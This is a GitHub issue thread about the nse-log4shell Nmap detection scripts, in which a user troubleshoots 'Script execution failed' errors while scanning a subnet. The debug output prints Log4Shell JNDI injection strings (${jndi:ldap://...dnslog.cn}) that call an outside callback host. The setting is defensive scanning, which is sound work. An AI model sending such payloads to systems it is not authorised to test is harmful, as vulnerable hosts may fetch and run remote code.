search

Diverto / nse-log4shell

Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
MIT License
349 stars 48 forks source link

Scanning of subnet with Zenmap #12

Open joelmjennings opened 2 years ago

joelmjennings commented 2 years ago

I am trying to scan a whole subnet. The single host works. It does the jndi ldap test. The scripts do not appear to run for the whole subnet. I do get one error.

On a windows box I run the following command

nmap -T4 -v -n --script http-log4shell,ssh-log4shell,imap-log4shell 10.41.251.0/24

|_ssh-log4shell: ERROR: Script execution failed (use -d to debug)

zer0init1 commented 2 years ago

Which version of nmap are you using? Does the error appear immediately or after a while?

joelmjennings commented 2 years ago

Zenmap 7.92

This is from one scan where some run and some do not. They fail or break immediately.

Bad one looks like Nmap scan report for 10.41.12.59 |_http-log4shell: ERROR: Script execution failed (use -d to debug)

Good one looks like Nmap scan report for 10.41.12.91 8000/tcp open http-alt |_http-log4shell: Did not follow redirect to https://${jndi:ldap://10.41.12.91-8000.xxxx.dnslog.cn}/en-US/

*EDIT I have some hosts that fail when its single IP as well, sorry just re-test on that

NSE: Script scanning 10.41.12.59.

Initiating NSE at 09:07

Completed NSE at 09:07, 0.06s elapsed

Nmap scan report for 10.41.12.59

Host is up (0.0054s latency).

Not shown: 988 closed tcp ports (reset)

PORT STATE SERVICE

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

|_http-log4shell: ERROR: Script execution failed (use -d to debug)

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open zephyr-clt

2105/tcp open eklogin

2107/tcp open msmq-mgmt

3389/tcp open ms-wbt-server

7937/tcp open nsrexecd

7938/tcp open lgtomapper

joelmjennings commented 2 years ago

This is with -d

NSE: Starting http-log4shell against 10.41.12.59:443.

NSE: [http-log4shell 10.41.12.59:443] Final payload:${jndi:ldap://10.41.12.59-443.xxxx.dnslog.cn}

NSE: Starting http-log4shell against 10.41.12.59:80.

NSE: [http-log4shell 10.41.12.59:80] Final payload:${jndi:ldap://10.41.12.59-80.xxxx.dnslog.cn}

NSE: http-log4shell against 10.41.12.59:443 threw an error!

C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:107: attempt to index a nil value (field 'auth')

stack traceback:

C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:107: in function <C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:26>

(...tail calls...)

NSE: [http-log4shell 10.41.12.59:80] Path does not require authentication

NSE: Finished http-log4shell against 10.41.12.59:80.